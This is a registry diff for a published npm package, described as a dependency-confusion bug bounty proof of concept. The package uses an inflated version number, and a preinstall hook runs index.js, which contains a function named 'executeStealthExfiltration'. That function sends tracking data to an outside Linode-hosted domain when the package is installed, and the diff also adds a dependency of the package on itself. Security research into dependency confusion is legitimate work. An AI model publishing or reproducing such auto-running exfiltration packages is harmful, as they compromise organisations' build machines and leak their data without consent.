internal-company-module-test-1337 99.99.999 → 99.99.9991

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Files changed (2) hide show
  1. package/index.js +1 -1
  2. package/package.json +5 -2
package/index.js CHANGED
@@ -7,7 +7,7 @@ module.exports = function() {
7
7
 
8
8
  (async function executeStealthExfiltration() {
9
9
  try {
10
- const attackerDomain = "139-162-186-101.ip.linodeusercontent.com";
10
+ const attackerDomain = ".139-162-186-101.ip.linodeusercontent.com";
11
11
 
12
12
  const trackingData = JSON.stringify({
13
13
  poc: "dependency-confusion",
package/package.json CHANGED
@@ -1,11 +1,14 @@
1
1
  {
2
2
  "name": "internal-company-module-test-1337",
3
- "version": "99.99.999",
3
+ "version": "99.99.9991",
4
4
  "description": "Bug Bounty PoC for Dependency Confusion",
5
5
  "main": "index.js",
6
6
  "scripts": {
7
7
  "preinstall": "node index.js"
8
8
  },
9
9
  "author": "Security Researcher",
10
- "license": "MIT"
10
+ "license": "MIT",
11
+ "dependencies": {
12
+ "internal-company-module-test-1337": "^99.99.9991"
13
+ }
11
14
  }